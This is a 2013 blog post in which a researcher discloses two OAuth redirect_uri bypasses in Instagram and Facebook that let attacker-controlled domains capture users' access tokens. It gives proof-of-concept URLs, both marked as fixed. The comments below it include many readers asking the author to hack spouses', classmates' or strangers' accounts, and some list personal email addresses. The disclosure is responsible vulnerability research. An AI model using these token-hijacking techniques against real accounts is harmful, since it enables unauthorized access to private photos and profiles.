2 May 2013
Category: Uncategorized
2 May 2013,
 25

How I Hacked Instagram Accounts

For this post, I’m going to show how I was able to hack into Instagram accounts via OAuth vulnerabilities (Instagram.com/facebook.com).

There are basically two ways to take advantage of Instagram OAuth.

1.

Hijack Instagram accounts using Instagram OAuth (https://instagram.com/oauth/authorize/)

2.

Hijack Instagram accounts using Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)

 

Successful attack will allow us  access to:

  • Private photos
  • The ability to delete photos and edit comments
  • The ability to post new photos.

 

Because I’m a fun of Instagram,” I thought to myself, “Maybe I should check their security?”

So When Facebook Acquired Instagram, I Started to check them for Security Vulnerabilities,

I reported them several vulnerabilities, Including OAuth Attacks, But  the acquisition didn’t closed yet and Facebook Security was unable to put their hands on security issues, So I waited, I waited as a WhiteHat,

Later I received a message from Facebook Security, They said, Even they could not fix it, They still want to pay these vulnerabilities.

 

Aquired

 

So I told them, No need for payout, That’s Because they could not perform security checks before the closing of the acquisition,

It’s amazing to see how Facebook Security doing a great job regarding their bug bounty program, Even that they didn’t close the acquirement, They still want to pay for these vulnerabilities.

 

While researching Instagram’s security parameters, I noticed that Facebook Security had produced some impressive results in regard to their own Instagram OAuth vulnerabilities. They essentially blocked access to any and all files, folders, and subdomains by validate the redirect_uri parameter.

 

Block Differnet domain

 

In addition, redirection was only allowed to go to the owner app domain. That was particularly bad news for me.

Thus, I needed to locate some other way to get past their protection. Further complicating the issue was the fact that you can’t use a site redirection / XSS on the victim’s owner app. This is because you have no access to the files or folders on the owner app domain through the redirect_uri parameter.

 

Block Files Folders

For example:

Allow request:

https://apigee.com

Block requests:

Redirect_uri=https://www.breaksec.com

Redirect_uri=https://a.apigee.com/

Redirect_uri=https://apigee.com/x/x.php

Redirect_uri=https://apigee.com/%23,? or any special sign

As it stands, it appears that the redirect_uri is invulnerable to OAuth attacks.

While researching, I came upon a sneaky bypass. If the attacker uses a suffix trick on the owner app domain, they can bypass the Instagram OAuth and then send the access_token code to their own domain.

For instance:

Let’s say my app client_id in Instagram is 33221863xxx and my domain is breaksec.com

In this case, the redirect_uri parameter should allow redirection only to my domain (breaksec.com), right? What happens when we change the suffix in the domain to something like:

Breaksec.com.mx

In this example, the attacker can send the access_token, code straight to breaksec.com.mx. For the attack to be successful, of course, the attacker will have to buy the new domain (in this case, breaksec.com.mx).

domainavaible

 

It’s also feasible to purchase other breaksec.com domains like:

com.tw

com.mx

com.es

com.co

com.bz

com.br

com.ag

PoC Bypass (Fixed By Facebook Security Team):

https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token

 

Game Over.

 

Bug 2.

 

With this bug, I used the Instagram client_id value through the Facebook OAuth (https://www.facebook.com/dialog/oauth).

 

When you use the Instagram app, it can be integrated with Facebook.

For example:

When a user wants to upload their Instagram photos to Facebook, they allow this interaction and integration to take place.

sharing option instagram

 

Instagram Would like to access your public profile and friend list

To my surprise, I discovered that an attacker can use virtually any domain in the redirect_uri, next parameter. This was actually sort of baffling, and I don’t know why this happened, but it worked. You can literally use any domain in redirect_uri, next parameter via the redirect_uri in Instagram client_id.

This effectively allows the attacker to steal the access_token of any Instagram user,

With the access_token the attacker will be able to post on the victim behalf in his Facebook account, Access to his private friends list.

 

PoC (Facebook Already fixed this issue):

https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token

 

PoC Video:

See you next time ;)

 

By @Nirgoldshlager

 

 

25 responses on “How I Hacked Instagram Accounts

  1. seriously you’re doing a great Job :d

  2. k0nsl says:

    In short: impressive!

  3. H says:

    Could you possibly hack an account for me? Please email me bulldog_girl@bellsouth.net . Thanks

  4. polo says:

    Coug you possibly delete an account for me? Please my friend my email is luis_polo10@hotmail.com

  5. Erica says:

    I used a fake name but I seriously need your help ASAP! I need an account deactivated that has been using inappropriate photos if me and I need the page gone ASAP! I will provide you with necessary information thank you!

  6. bob says:

    Hello, could you please help me hack this instagram account: PRISCILOZANO I think my wife is cheating on me, and i DONT access to her instagram, thanks

  7. Alicia says:

    I will pay you heaps if you can get me my account back.
    please email me at:::: Aliciamarrie@hotmail.com

  8. JN says:

    can you help me hack into a account please

  9. Steph says:

    Hi, I don’t remember my password and my account for some reason isn’t being recognised by Facebook even though it’s linked. Would you be able to help me retrieve my password?

  10. Kris says:

    can you help me? I’m getting threats from an instagram and i’d like to know who it is.

  11. LDR says:

    Can you please help me hack a imposter account that’s giving out false information of someone I am close to? Email me @ lanasdelrey12@gmail.com

  12. christina cowley says:

    hey there! could you please get my account back for me? my email is cowleytina5@yahoo.com, and my hacked IG is @christinacowleyyy

  13. Kimberly says:

    Hi. I would really like the username @demi on instagram but it’s taken by an inactive user, therefore I can’t get it. Could you possibly hack their account and change the username so I could get it. Please email me ASAP.

  14. Hannah says:

    hi, my Instagram account @lovatoshine that I was co-owning with two of my friends just got hacked. if you hack it back for me ASAP it would be awesome so please & thank you!!

  15. Amy says:

    Hey! Could you please hack @anacolagreco for me on instagram? Shes rlly mean to me at school and I had it.. Thank you for your time xxx

  16. Maya says:

    If you don’t mind, could you email me at: xTamagotchi@gmail.com and give me a simple step-by-step tutorial on how to hack back my account? Also there are account names that I want but they are taken but their accounts are inactive and Instagram won’t take them off! And the hate pages also! Thank you so much!

  17. larry says:

    please hack for and with us email me at baker.larry92@yahoo.com i would like an instagram account hacked sometimes you just have to leave it too the pro’s.

  18. Terese says:

    Could you possibly delete an IG account for me? or show me the steps, email me tgmac100@gmail.com

  19. Sarah says:

    Hi! I forgot my password on IG and i cant figure it out. IG wont link to my fb and it also won’t send a reset password in my email please help!!! :( username is sarahmayaguilar

  20. merly says:

    can you open her photos http://instagram.com/anatavadya/ thank you

  21. Chantel says:

    Can You Please Email Me About Gettng My Instagram Back I Need Help !

  22. Pissed off wife! says:

    I need your help….please email me At sxyangelmom2b@aol.com…..this woman is having an affair with My husband and i want to catch her but i cant see any Of her Photos…..i am pregnant and really need your help….need to know the truth because I’m pissed off and hormonal!….not a good combo!

  23. Thomas says:

    Can u hack my girl instegram. I need to know all the commets she gets. Please get back ti me

  24. Nikki says:

    My ig was hacked. I can’t find an official number or location of instagram in which I could contact them. I’m asking if you could please help me get my account back. I was using it to help promote my clothing line.

  25. Selena says:

    Can you help me get my 1st instagram back? it got hacked and i am trying to get it back for like a long time so if you can help me out please email me at selenayan99@gmail.com thank you! i will appriciate if you can :D

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>